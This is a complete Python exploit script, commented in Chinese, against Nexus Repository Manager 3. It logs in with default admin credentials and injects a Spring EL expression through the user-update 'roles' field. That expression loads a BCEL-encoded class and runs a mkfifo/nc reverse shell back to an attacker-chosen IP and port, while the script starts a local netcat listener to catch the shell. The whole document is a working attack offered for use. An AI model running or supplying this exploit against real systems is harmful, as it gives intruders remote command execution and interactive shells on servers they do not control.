import requests import json import subprocess import threading # === 用户交互式输入 === target_ip = input("请输入目标 Nexus3 IP(例如 192.168.109.4): ").strip() target_port = input("请输入目标 Nexus3 端口(例如 60357): ").strip() callback_ip = input("请输入本机监听 IP(例如 192.168.109.10): ").strip() callback_port = input("请输入本机监听端口(例如 4444): ").strip() HOST = f"http://{target_ip}:{target_port}" CALLBACK_IP = callback_ip CALLBACK_PORT = callback_port USERNAME_B64 = "YWRtaW4%3D" PASSWORD_B64 = "YWRtaW4xMjM%3D" # === 完整 BCEL 字符串(务必为一整行) === BCEL_STRING = """$$BCEL$$$l$8b$I$A$A$A$A$A$A$ff$8dSMS$d3P$U$3d$8f$b6I$J$v$U$K$94$60QA$c5P$uU$E$3fZD$Fq$86$Z$40$87$3a$3a$ZWi$fa$c0$60I$3ai$ca$b0r$e5$7fq$ab$9b$d6$91$d1$a5$L$7f$87$L$fd$P$8ex_Z$3e$8a$ca$d8I$df$cb$bb$f7$9c$7b$eeG$de$d7_$l$3f$D$98$c5$p$F$j$I$c9$I$ab$88$40b$88o$9b$bbf$b6l$3a$5b$d9$c7$c5mn$f9$M$d2$bc$ed$d8$fe$CCH$9fx$a6$m$8aN$Z$8a$8a$$$a8$M$bd$c7$f0$8d$9a$e3$db$3b$9cA$d9$e2$fe$d1a$40$9fX$fd$D$93$97$d1$dd$sU$f0$3d$db$d9$8a$o$ce$mg$8b$b6$93$ad$be$8c$a2$8f$a1$pc$J$c1$7e$V$D$Yd$I$f3$3dn1$e8$fa$8b$d5$d3$dc$fcI$99$t$9ek$f1j$95d$86$Y$G$D$bb$edf$Xk$9b$9b$dc$e3$a5$Nn$96$b8$tc$98A$3b$f4$ad8$95$9aO$91$b8$b9$d3t$xHaD$c6y$V$Xp$b1$ad$ceVp$86n$aa$f3$E$8f$nyXk$7b$c0$bc$C$Nc$a2$bf$97$Y$86$f4$bfBDc$93$b8$o$40$e3$M$89cP3$9b$c0$9f$82$aebBd$p$94$97$3d$cf$f5$9al$Z$93$q$7e$ba$p$8b5$bb$i$U$92FH$E$9fV$91$c55$86$uQJ$ab$b6C$c3$e9o$hN$ab$91$820$a3$e2$Gfi$f4f$a5$c2$9d$SCF$3f$bb$e3m$92A$88$9b$o$c4$z$86$94$bet6$f0$8e$8a$5c$90$97$ef6$9d2$e6$Z$o$7c$d7$y$cf$d0$c8$97$dc$Se$da$p$S$5e$af$ed$U$b9$f7$d4$y$96$c92$fe_$Z$e5$Zb$F$df$b4$5e$ad$99$95$WQY$de$b3x$c5$b7$5d$a7$wc$89$9a$7d$cc9$f2$Q$aa$e0$d6$3c$8b$3f$b2$DJ$90$cc$b4$Ab$Uy$ba1$e2$d7$B$s$ee$M$adw$e94B$3b$a3$3d$92n$80$bd$a7$X$86$FZ$a5$c0$Y$a6u$A$f7$88$o$a0$df$88$s$d3$fe$e6$Dd$e9$TbF$a8$af$a7$60$84$fbz$LFd$b2PGbm$lIc$l$9a1U$c7$b9$GF$h$b8$bc$7e$c2t$b5i$ca$85$f7$916$g$98$caE2ud$8c$9c$f4$F$J$z$a2Iu$5c$8f$xu$cc$3d$7f$7b$f0C$L$ff$cb$f5$5d$8b$d4q$fb$5dP$88$c8t$i$9d$b4F$e9$5b$ed$c2$YTL$n$869t$e3$3e$e2XA$C$W$fa$f1$g$83t$G$f9C$Hd$94d$d0$j$8b$c9H$c9H$GO$g$f8$J$8dl$c3x$d0$aa$7b$91$fe$P$D$95$e5$df$5d$90$g$iv$E$A$A""" # === 监听线程 === def listen_shell(): print(f"\n[+] 启动监听:nc -lvnp {CALLBACK_PORT}") print("[*] 如果目标成功反弹,你将在此终端获得 shell。\n") subprocess.call(["nc", "-lvnp", str(CALLBACK_PORT)]) # === 启动监听线程 === listener_thread = threading.Thread(target=listen_shell) listener_thread.start() # === 登录获取 NXSESSIONID === login_url = f"{HOST}/service/rapture/session" login_headers = { "X-Nexus-UI": "true", "Referer": f"{HOST}/", "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9", "User-Agent": "Mozilla/5.0", "Accept": "*/*", "Origin": HOST, "X-Requested-With": "XMLHttpRequest", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8" } login_data = f"username={USERNAME_B64}&password={PASSWORD_B64}" print("\n[+] 正在登录 Nexus3...") session = requests.Session() resp = session.post(login_url, headers=login_headers, data=login_data) if "Set-Cookie" not in resp.headers and resp.status_code != 204: print("[-] 登录失败!响应内容:") print(resp.text) exit() cookie = session.cookies.get_dict().get("NXSESSIONID", "") print(f"[+] 登录成功,NXSESSIONID = {cookie}\n") # === 构造 Spring-EL 注入 payload === el_expr = ( f"${{''.class.forName('com.sun.org.apache.bcel.internal.util.ClassLoader')" f".newInstance().loadClass('{BCEL_STRING}')" f".newInstance().exec('rm -f /tmp/f;mkfifo /tmp/f;/bin/sh -i < /tmp/f 2>&1 | nc {CALLBACK_IP} {CALLBACK_PORT} > /tmp/f')}}" ) inject_data = { "action": "coreui_User", "method": "update", "data": [{ "userId": "admin", "version": "10", "firstName": "Administrator", "lastName": "User1", "email": "admin@example.org", "status": "active", "roles": [el_expr] }], "type": "rpc", "tid": 24 } inject_headers = { "Cookie": f"NXSESSIONID={cookie}", "Content-Type": "application/json", "Origin": HOST, "Referer": f"{HOST}/", "X-Nexus-UI": "true", "User-Agent": "Mozilla/5.0", "X-Requested-With": "XMLHttpRequest" } print("[+] 正在发送 exploit payload...") exploit_url = f"{HOST}/service/extdirect" exploit_resp = session.post(exploit_url, headers=inject_headers, data=json.dumps(inject_data)) print(f"[+] 返回状态码: {exploit_resp.status_code}") print("[+] 服务器响应:") print(exploit_resp.text) # === 等待监听线程结束(即交互 shell) === listener_thread.join()